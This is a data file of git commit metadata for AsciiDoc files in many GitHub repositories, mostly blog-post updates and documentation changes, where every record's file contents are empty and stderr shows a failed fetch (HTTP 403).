{"commit":"eaf0ca1e3251ad1d74afde39f175de5e76aaad47","subject":"Delete the file at '_posts\/2012-12-1-Frisbeens-historie.adoc'","message":"Delete the file at '_posts\/2012-12-1-Frisbeens-historie.adoc'","repos":"discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk","old_file":"_posts\/2012-12-1-Frisbeens-historie.adoc","new_file":"_posts\/2012-12-1-Frisbeens-historie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/discimport\/blog.discimport.dk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec5da570b9dfc7cb81ffd2cb6fd9bdd38edf870e","subject":"Instructions for Download","message":"Instructions for Download\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/download.adoc","new_file":"lab\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ead10dbd267380c7b6ee4dec3ab903a1d60a188","subject":"Document IGNORE_EXTENSIONS = GIT","message":"Document IGNORE_EXTENSIONS = GIT\n","repos":"rumpelsepp\/pynote","old_file":"man\/noterc.5.adoc","new_file":"man\/noterc.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c22293b6478328618fb89e220668d4921137a9a","subject":"Update 2016-03-01-Hub-Press.adoc","message":"Update 2016-03-01-Hub-Press.adoc","repos":"buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io","old_file":"_posts\/2016-03-01-Hub-Press.adoc","new_file":"_posts\/2016-03-01-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buliaoyin\/buliaoyin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcdc668971b58f6dbc0c6870729d1c8dbfce3b90","subject":"Update 2016-10-08-Drools-60.adoc","message":"Update 
2016-10-08-Drools-60.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-10-08-Drools-60.adoc","new_file":"_posts\/2016-10-08-Drools-60.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70cedfb971ce14439ab9eeb54c997b8983086a31","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa98e8aa0bf6f20e3a12a4f368cfdabe6ccf627","subject":"initial commit of the tools dir","message":"initial commit of the tools dir\n","repos":"ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan","old_file":"tools\/readme.adoc","new_file":"tools\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ProgrammingRobotsStudyGroup\/robo_magellan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afc39f7516e27143bb1719ee3be83abd337e031b","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebe45faf3dbde5b9100aa0f2e375172d8b4b20d0","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdcafcb7257eeb478c778773065739234102d9eb","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/jenkins-scripts","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/jenkins-scripts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1a0545bf5dabc14d59a050d7ebc1810a026fd2f","subject":"Create TechnologyStacks.adoc","message":"Create 
TechnologyStacks.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"TechnologyStacks.adoc","new_file":"TechnologyStacks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"493191f47c85ab14955fe3c4e4fd7c2612030506","subject":"y2b create post Galaxy Note 4 Bend Test","message":"y2b create post Galaxy Note 4 Bend Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-10-08-Galaxy-Note-4-Bend-Test.adoc","new_file":"_posts\/2014-10-08-Galaxy-Note-4-Bend-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"742520f9f3cf491bd0c09625a4b2dbd54bebfc31","subject":"Update 2015-09-26-Sort-Algorithms-Summary.adoc","message":"Update 2015-09-26-Sort-Algorithms-Summary.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Sort-Algorithms-Summary.adoc","new_file":"_posts\/2015-09-26-Sort-Algorithms-Summary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20dcdc8522bea87510b3815478c31d3b37827e46","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ce1891f98360046214fc14db599caf56331c123","subject":"Add contribution guide","message":"Add contribution guide","repos":"oskopek\/irsee.net,oskopek\/irsee.net","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/irsee.net.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b3f385cf99f4c0f7f09136b96ed9af926f490f","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16dc124f073e4dc29e4c60703b18138af4d3f16c","subject":"Update 
2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4ea8e453f65f69d6174206081cc139fb70830ce","subject":"Clarif time","message":"Clarif time\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Maven\/Maven central.adoc","new_file":"Maven\/Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23dcc48cdc7a7f81cba8cd08308a9e339f3ff36f","subject":"Update 2016-03-04-New-Frozen-musical-opening-in-Disney-California-Adventure-May-27.adoc","message":"Update 2016-03-04-New-Frozen-musical-opening-in-Disney-California-Adventure-May-27.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-04-New-Frozen-musical-opening-in-Disney-California-Adventure-May-27.adoc","new_file":"_posts\/2016-03-04-New-Frozen-musical-opening-in-Disney-California-Adventure-May-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c5f7d92d02f5d8dbdd7016a006aa0f942816e13","subject":"Update 2015-05-03-New-blog.adoc","message":"Update 2015-05-03-New-blog.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2015-05-03-New-blog.adoc","new_file":"_posts\/2015-05-03-New-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45e00a79558330c1f218d5d01691a34725419bdc","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea5614446183adfa615134924a4f53e353e0fb3","subject":"Preliminary draft of Consensus Hashing proposal.","message":"Preliminary draft of Consensus Hashing proposal.\n","repos":"dexX7\/bitcoin-spock,dexX7\/bitcoin-spock,OmniLayer\/OmniJ,dexX7\/OmniJ,OmniLayer\/OmniJ,dexX7\/OmniJ,OmniLayer\/OmniJ","old_file":"adoc\/msc-consensus-hashing.adoc","new_file":"adoc\/msc-consensus-hashing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"345562d059afb7cde4f546acd0d4f4cd74e770ec","subject":"fix typo 'Multi-theading'","message":"fix typo 'Multi-theading'\n","repos":"openlimit-signcubes\/dss,esig\/dss,openlimit-signcubes\/dss,esig\/dss","old_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openlimit-signcubes\/dss.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"daf929caa8e93ee43675cdb637b118a6cbd4e94c","subject":"Added artifact yaml style guide","message":"Added artifact yaml style guide\n","repos":"google\/grr-doc","old_file":"artifact_yaml_style.adoc","new_file":"artifact_yaml_style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/google\/grr-doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e31bb17719536d90f3a30f01d5788bd35228de63","subject":"CL: notes on using open and close","message":"CL: notes on using open and close\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9ed38922f56ba735d97144db69f6fae3520a84c3","subject":"y2b create post iPad Air Giveaway!","message":"y2b create post iPad Air Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-11-iPad-Air-Giveaway.adoc","new_file":"_posts\/2013-11-11-iPad-Air-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"960db2e9568c0fc43ad0bc7076ba6a0bfaf74abe","subject":"Update 2018-03-08-Thinking.adoc","message":"Update 2018-03-08-Thinking.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-03-08-Thinking.adoc","new_file":"_posts\/2018-03-08-Thinking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"443aa40d312fb030d0d14e8e17f61d65e5d0aee0","subject":"Add a man page for daniel-pass.","message":"Add a man page for daniel-pass.\n\nSigned-off-by: brian m. 
carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/daniel-ruby,bk2204\/daniel-ruby","old_file":"doc\/daniel-pass.adoc","new_file":"doc\/daniel-pass.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/daniel-ruby.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b22ca45e138dc6d7f3c117c999333df37c20d5a","subject":"BXMSDOC-2127: Modularizing and updating chap-planner-introduction.adoc file for DM 7.0","message":"BXMSDOC-2127: Modularizing and updating chap-planner-introduction.adoc file for DM 7.0\n","repos":"jomarko\/kie-docs,michelehaglund\/kie-docs,jomarko\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs","old_file":"docs\/product-business-resource-planner-guide\/src\/main\/asciidoc\/optimizer-maven-configuration-proc.adoc","new_file":"docs\/product-business-resource-planner-guide\/src\/main\/asciidoc\/optimizer-maven-configuration-proc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jomarko\/kie-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"031ffc35137458da169f47d61307c39b70ed5034","subject":"Initial revision\/import. (#481)","message":"Initial revision\/import. (#481)\n\n","repos":"nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip","old_file":"docs\/specs\/chip-tlv-format.adoc","new_file":"docs\/specs\/chip-tlv-format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/project-chip\/connectedhomeip.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"533fdb4a7b797cc99661f61ff1b9c45cd6e25d6c","subject":"Update 2015-02-18-Work-standing-up-and-meditation.adoc","message":"Update 2015-02-18-Work-standing-up-and-meditation.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-18-Work-standing-up-and-meditation.adoc","new_file":"_posts\/2015-02-18-Work-standing-up-and-meditation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86de2ab0ba2f247f55cc699b5f9e1482eaf34c80","subject":"knowledge note","message":"knowledge note\n","repos":"jarodsun\/note_everything","old_file":"notes.adoc","new_file":"notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarodsun\/note_everything.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"6bdf9dbf6910ae943ca1f12f787c61396a7666e2","subject":"I prefer asciidoc","message":"I prefer asciidoc\n","repos":"vdmeer\/skb-java-examples,vdmeer\/skb-java-examples,vdmeer\/skb-java-examples,vdmeer\/skb-java-examples","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/vdmeer\/skb-java-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70afe95342d2fbef88d542396923858446e6f534","subject":"Configuration for the tensorics repo.","message":"Configuration for the tensorics repo.\n\nIt should start working as soon as we add travis and Coveralls.\nConflicts:\n\tREADME.asciidoc\n\n\ngit-svn-id: 931ef96727c1945c41eec76d1319aea4c3c125f4@11178 6cd15df7-5b2d-4548-a7df-5dcce267a22b\n","repos":"tensorics\/tensorics-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f41e4b11bc4f91ed341b253a891d95afc12f22b6","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00e3b7a672ed10695b247cea5e691be735c8a3cb","subject":"Update 2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Update 2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"_posts\/2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9581365eca52e1e1036aba635e8671f78b4e21a2","subject":"Add news\/2016-10-03-forge-3.3.2.final.asciidoc","message":"Add news\/2016-10-03-forge-3.3.2.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-10-03-forge-3.3.2.final.asciidoc","new_file":"news\/2016-10-03-forge-3.3.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"241c05fed67f8d86da01fd52e87e81ba528a8999","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40569967ecc7fe2506d34fdb14f730b54d336745","subject":"y2b create post You've Never Seen 
Headphones Like This...","message":"y2b create post You've Never Seen Headphones Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-12-Youve-Never-Seen-Headphones-Like-This.adoc","new_file":"_posts\/2017-05-12-Youve-Never-Seen-Headphones-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e618d0b2835737a38b40eedeb65ee53ad59ed4c2","subject":"Update 2016-04-06-FW4SPL-branches-status.adoc","message":"Update 2016-04-06-FW4SPL-branches-status.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2016-04-06-FW4SPL-branches-status.adoc","new_file":"_posts\/2016-04-06-FW4SPL-branches-status.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fc7dc36636a7f842e7277eadb3c2002c6487dc9","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cbf86b406400b6b6369910d2989d3a44c36500c","subject":"Update 2015-07-31-a-3rd-test.adoc","message":"Update 2015-07-31-a-3rd-test.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-07-31-a-3rd-test.adoc","new_file":"_posts\/2015-07-31-a-3rd-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4103ee72c9b4970e9ea0f4e0db5535dbba8ca37","subject":"Update 2017-06-03-El-placer-del-sueno.adoc","message":"Update 2017-06-03-El-placer-del-sueno.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-03-El-placer-del-sueno.adoc","new_file":"_posts\/2017-06-03-El-placer-del-sueno.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77aa58e5d73b78ed200e6ce7eadf14bb31a07823","subject":"sectanchors","message":"sectanchors","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/JPA.adoc","new_file":"Best practices\/JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bccc3a12324f218c567047b65d9ee374db081e2","subject":"Publish 2016-7-2-Life.adoc","message":"Publish 
2016-7-2-Life.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-Life.adoc","new_file":"2016-7-2-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1ba8400c30dac0253d08e911120e31c1c853fd9","subject":"Deleted 2016-12-2-3-Dpen.adoc","message":"Deleted 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df1cfba44981a32cec24f2e9ee7cfc6aa3b95feb","subject":"ClojureX conference 2018 (#257)","message":"ClojureX conference 2018 (#257)\n\nDescription of the ClojureX conference in London in December 2018","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/clojurex.adoc","new_file":"content\/events\/2018\/clojurex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5dfd697831b465fa6d7eab4660441a1b231c8909","subject":"y2b create post THEY SHRUNK MY STUFF!","message":"y2b create post THEY SHRUNK MY STUFF!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-07-THEY-SHRUNK-MY-STUFF.adoc","new_file":"_posts\/2015-12-07-THEY-SHRUNK-MY-STUFF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"805807894a2b40027a1b634d46f7c8ad293f1101","subject":"Update 2016-08-19-Double-Blogging-on-the-Triple-Frontier.adoc","message":"Update 2016-08-19-Double-Blogging-on-the-Triple-Frontier.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-19-Double-Blogging-on-the-Triple-Frontier.adoc","new_file":"_posts\/2016-08-19-Double-Blogging-on-the-Triple-Frontier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb5b2a2020141bc50a9d8f53ab1922f4f6abb2b5","subject":"Update 2017-04-25-Server-Virtualization-Management-Part2.adoc","message":"Update 